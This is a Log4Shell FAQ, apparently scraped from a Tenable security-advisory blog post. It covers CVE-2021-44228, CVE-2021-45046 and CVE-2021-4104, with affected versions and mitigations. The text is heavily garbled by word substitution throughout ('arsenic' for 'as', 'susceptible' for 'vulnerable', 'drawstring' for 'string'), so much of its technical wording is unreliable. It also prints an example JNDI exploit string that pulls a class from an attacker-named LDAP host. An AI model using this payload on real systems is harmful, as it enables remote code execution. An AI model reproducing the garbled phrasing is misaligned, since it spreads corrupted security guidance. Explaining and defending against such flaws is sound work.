CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabilities

1 month ago 124

A database of often asked questions related to Log4Shell and associated vulnerabilities.

Background

Following the discovery of the Apache Log4j vulnerability known arsenic Log4Shell connected December 9, The Security Response Team has enactment unneurotic the pursuing blog station to reply immoderate of the much often asked questions (FAQ) astir Log4Shell and the recently disclosed vulnerabilities successful Log4j.

FAQ

What is Log4j?

Log4j is simply a wide utilized Java logging room included successful Apache Logging Services. It is utilized to log messages from an exertion oregon service, often for debugging purposes.

What is CVE-2021-44228?

CVE-2021-44228 is simply a distant codification execution (RCE) vulnerability successful Apache Log4j 2.0 done 2.14.1. It has been dubbed Log4Shell by information researchers.

How tin CVE-2021-44228 beryllium exploited?

A remote, unauthenticated attacker could exploit this flaw by sending a specially crafted petition to a server moving a susceptible mentation of log4j. This could beryllium achieved by submitting an exploit drawstring into a substance tract connected a website oregon by including the exploit drawstring arsenic portion of HTTP headers destined for a susceptible server. If the susceptible server uses log4j to log requests, the exploit volition past petition a malicious payload from an attacker-controlled server done the Java Naming and Directory Interface (JNDI) implicit a assortment of services, specified arsenic Lightweight Directory Access Protocol (LDAP).

An illustration exploit would look thing similar this:

${jndi:ldap://attackersite.com/exploit.class}

What happens if the vulnerability is exploited?

The susceptible log4j room would petition and execute a malicious payload from the attacker-controlled server.

Have we seen immoderate attacks successful the chaotic truthful far?

Attackers person already begun utilizing Log4Shell successful a assortment of ways, including:

  • Cryptocurrency mining bundle (cryptominers)
  • Distributed denial-of-service (DDoS) botnets
  • Ransomware

There are reports that some nation authorities groups and initial entree brokers person already begun leveraging the flaw, which means we should expect precocious persistent menace (APT) groups and ransomware affiliates volition apt beryllium leveraging the flaw successful the precise adjacent future.

Why is Log4Shell specified a large deal?

Log4j is simply a wide utilized room crossed a fig of products and services for logging purposes, which creates a ample onslaught surface. Exploiting Log4Shell is simple, with readily disposable proof-of-concept codification connected GitHub. Finally, due to the fact that galore organizations don’t cognize conscionable however prevalent this room is wrong the products and services they use, this could apt person semipermanent effects.

Was Log4Shell addressed successful Log4j 2.15.0?

No, Apache released Log4j 2.16.0 to code an incomplete hole for Log4Shell. Apache assigned a caller CVE for this incomplete fix: CVE-2021-45046.

What is CVE-2021-45046?

CVE-2021-45046 was primitively reported arsenic a denial of work vulnerability successful Apache Log4j 2.0 done 2.15.0, and has since been upgraded to a RCE. Under circumstantial non-default configurations wherever a Context Lookup (e.g.: $${ctx:loginId}) is used, an attacker that crafts a JNDI lookup utilizing malicious input information would beryllium capable to origin a DoS information oregon execute RCE connected a susceptible server utilizing Log4j 2.

Does the mitigation for Log4Shell use to CVE-2021-45046?

No. According to Apache, the erstwhile mitigation for CVE-2021-44228 — mounting formatMsgNoLookups to existent — is an insufficient mitigation altogether. That guidance failed to relationship for different codification paths successful which connection lookups could occur. Because of this, Apache present recommends upgrading to a harmless mentation of Log4j, starting with 2.16.0 and 2.12.2 (for Java 7). If that is not possible, Apache recommends removing the JndiLookup classpath.

What does the merchandise of Log4j 2.16.0 really do?

Based connected the merchandise notes, Apache has chosen to harden Log4j by removing connection lookups and disabling JNDI by default.

My enactment uses Java 7 and we can’t upgrade to Log4j 2.16.0. What bash we do?

Apache released Log4j 2.12.2 to code CVE-2021-45046 for Java 7. If contiguous patching is not possible, Apache advises removing the JndiLookup people from the classpath. Guidance connected however to region this classpath tin beryllium recovered successful the Apache documentation.

Is Log4j 1.x vulnerable?

There is inactive a batch of accusation coming retired surrounding Log4Shell. At the clip this blog was published, Apache said that Log4j 1.2 is vulnerable successful a akin mode erstwhile Log4j is configured to usage JMSAppender, which is not portion of the default configuration, but is not specifically susceptible to CVE-2021-44228. This vulnerability successful Log4j 1.2 has been assigned CVE-2021-4104.

Is determination a spot disposable for Log4j 1.2?

No, Log4j subdivision 1.x has reached extremity of beingness (EOL) status, and truthful does not person information updates. Users are instructed to upgrade to Log4j 2.12.2 (for Java 7) oregon 2.16.0 oregon greater.

How bash I code CVE-2021-4104?

There are a fewer mitigation options that tin beryllium utilized to forestall exploitation of CVE-2021-4104.

  • Do not usage the JMSAppender successful the Log4j configuration
  • Remove the JMSAppender people record (org/apache/log4j/net/JMSAppender.class)
  • Limit OS idiosyncratic entree to forestall an attacker from being capable to modify the Log4j configuration

What’s the communicative present with each of these vulnerabilities?

Here’s what we cognize arsenic of December 17:

  • Three CVEs person been assigned for vulnerabilities affecting Log4j
CVEVulnerability TypeAffected Log4j VersionsNon-Default Config
CVE-2021-44228 RCE 2.0 done 2.14.1 No
CVE-2021-45046 Denial of Service (DoS) and RCE 2.0 done 2.15.0 Yes
CVE-2021-4104 RCE 1.2* Yes
  • Only CVE-2021-44228 is exploitable out-of-the-box erstwhile Log4j versions 2.0 done 2.14.1 are included arsenic a room successful applications and services
  • CVE-2021-45046 and CVE-2021-4104 are lone contiguous successful definite non-default configurations
  • CVE-2021-4104 volition not beryllium patched, arsenic the Log4j 1.x subdivision has reached end-of-life

What are the fixed versions of Log4j that code these vulnerabilities?

Log4j ReleaseJava VersionRelease Availability
2.16.0 Java 8 Yes
2.12.2 Java 7 Yes
1.2 - No (EOL)

What is the likelihood of exploitation for these vulnerabilities?

The pursuing array summarizes exploitability and whether oregon not a vulnerability was already being exploited.

CVELikelihood of ExploitationAlready Exploited
CVE-2021-44228 High Yes
CVE-2021-45046 Low No
CVE-2021-4104 Low No

Is Tenable susceptible to immoderate of the vulnerabilities successful Log4j?

Tenable CISO Bob Huber has issued a afloat connection which tin beryllium recovered here.

What are ways me/my enactment tin place these vulnerabilities successful Log4j?

Tenable has released a fig of plugins, scan templates and dashboards (Tenable.io, Tenable.sc) for our products.

  • For updated accusation connected the plugins that person been released, delight notation to this post connected the Tenable Community.
  • For updated accusation astir scan templates that person been released, delight notation to this post connected the Tenable Community.

Get much information

Join Tenable's Security Response Team connected the Tenable Community.

Learn much astir Tenable, the archetypal Cyber Exposure level for holistic absorption of your modern onslaught surface.

Get a free 30-day trial of Tenable.io Vulnerability Management.

Satnam Narang

Satnam Narang

Satnam joined Tenable successful 2018 arsenic a Senior Security Response Manager. He has implicit 15 years acquisition successful the manufacture (M86 Security and Symantec). He contributed to the Anti-Phishing Working Group, helped make a Social Networking Guide for the National Cyber Security Alliance, uncovered a immense spam botnet connected Twitter and was the archetypal to study connected spam bots connected Tinder. He's appeared connected NBC Nightly News, Entertainment Tonight, Bloomberg West, and the Why Oh Why podcast.

Interests extracurricular of work: Satnam writes poesy and makes hip-hop music. He enjoys unrecorded music, spending clip with his three nieces, shot and basketball, Bollywood movies and euphony and Grogu (Baby Yoda).

Read Entire Article